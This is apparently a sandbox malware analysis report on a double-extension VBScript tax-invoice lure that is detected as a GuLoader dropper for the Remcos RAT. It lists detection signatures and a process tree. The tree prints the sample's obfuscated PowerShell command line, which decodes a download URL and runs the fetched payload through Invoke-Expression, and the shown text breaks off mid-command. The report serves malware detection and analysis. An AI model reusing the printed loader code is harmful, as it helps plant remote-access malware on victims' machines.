Windows Analysis Report
NTS_eTaxInvoice.html.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1264 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 1788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted L ivserfaren t Magmatis m #>;$Homo logue='ens orrow';<#p rossie Udr yddelsesle jrenes Int erjectiona lized joba nnoncer An stillelser Sdmefulde s Bakkeen #>;$Sledge hammered=$ host.Priva teData;If ($Sledgeha mmered) {$ Genanvende lser++;}fu nction Dem issioner($ Unlaconic) {$Conversa tions=$Une ngaging+$U nlaconic.L ength-$Gen anvendelse r;for( $Ka naljen=5;$ Kanaljen - lt $Conver sations;$K analjen+=6 ){$Cochleo us+=$Unlac onic[$Kana ljen];}$Co chleous;}f unction Co mplimentab le($centro nucleus){ . ($Garan ti) ($cent ronucleus) ;}$Convect ively=Demi ssioner 'A dherMPinoc o.ivinzDes iligene lR ed,vlR.rri a Limo/Mic .o5Efter.E oti0.itdo Phram(Odi niWPrvebiS yndin Breb dHid eo Ad vewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super ;Pr,va Ase p WIndk,iH alvpn enat 6Still4Ana bl; Peri B laanxOppeb 6Smukt4Cou nt;Filtr C uretrBasi vBedoe:Dry pf1Flo e2M ando1Soran .Tipol0bag gr)Spotm a ngstGPho.o ekongec.ei gekN,wfooR all/Tria 2Svmme0Sge ko1Telem0D ool0 Babe 1rdk k0Mar ki1Recir B .jekFKalen iTrl grhyp opeRehabfS kimtoOpht. x ffec/Ch om1Rund,2 Scut1 Ytre .Ripen0Und lb ';$Sacc harofarina ceous=Demi ssioner ' PostUTek o SKanteESk ivRVan e-R iffiAMulti gWeeklEmel oNIdiorT Pr.t ';$De rmoid108=D emissioner 'TzolkhWy nketIndflt Ga.gpP.rs osForga:Se cti/abern/ FemdodHosp ir StariMo ilsvKakkee Chup.Dela fgDeflooRe dero,endrg MonolFugt ieArkiv.Me dvicA,eneo Ko,mumObsk n/ ailluHa rroc Ince? 
Mo emeErga sx LivspIn obto Pu rr valetDrue k= forsdFo rtroMatriw Con entill ylGnat,oAn greaSo mad gldsf&.usk eiParamdBa cil= Nive1 Pilloa ffi cJAnticrKa pil3FremmE PrimrNKor, oUH,perZPa .acI BoucK FeatuKSkyt sZnanziBTe ks mHaircN Svineb Afl gdFoame6Me nedi Mutao Sols.0 gtp barr sC ac co5DekupvS endesAlder IImmunIJaz zo6KommuaO ve.vL.aike 1Antit ';$ Henrykkels er=Demissi oner ' Und .>Ga.um '; $Garanti=D emissioner 'uns.dIBe spiEUne hX Ndend ';$F unktionens 98='Zizit' ;$Klemskru e67='\Fors varsundtag elsen.Non' ;Complimen table (Dem issioner ' S,udv$pott egNonmulSk ifeo kloeb PolitaTer, ilph.ll:Fo rbrTSubpra Euphok Vat ttAlterrKo mmueUdr ag acuuBrn p lPaahneDef inrStigmiH alssnD.lan gUn omsF r gro rrisrW ar,odSolba nNeglei Hj denAgramgT ilkr=Antik $Mutile Ud fln FendvN onfa:blatt a Frikp Kl asp tetidG nat.aSkole tmonu aInd ja+ Srej$S ekssKColeg lBetake C vimBe.risP iruekInd u r BekmuBam bue erni6H emap7 Asp, ');Compli mentable ( Demissione r ' Prmi$Q ibbgStenk lFiletoI d esbChambaU nderl Spec : ardRnonm oeLycopk r hebr Prole Skov eHaze lr SatreIn dbodSnoree nyh dsTung s= Eco,$ H jemD Udlae Stro rColo gmIndsaoSa mpli Mimod ko,m1 loa t0Affat8Re for.Bedris E prpJ.gt rlDehemi e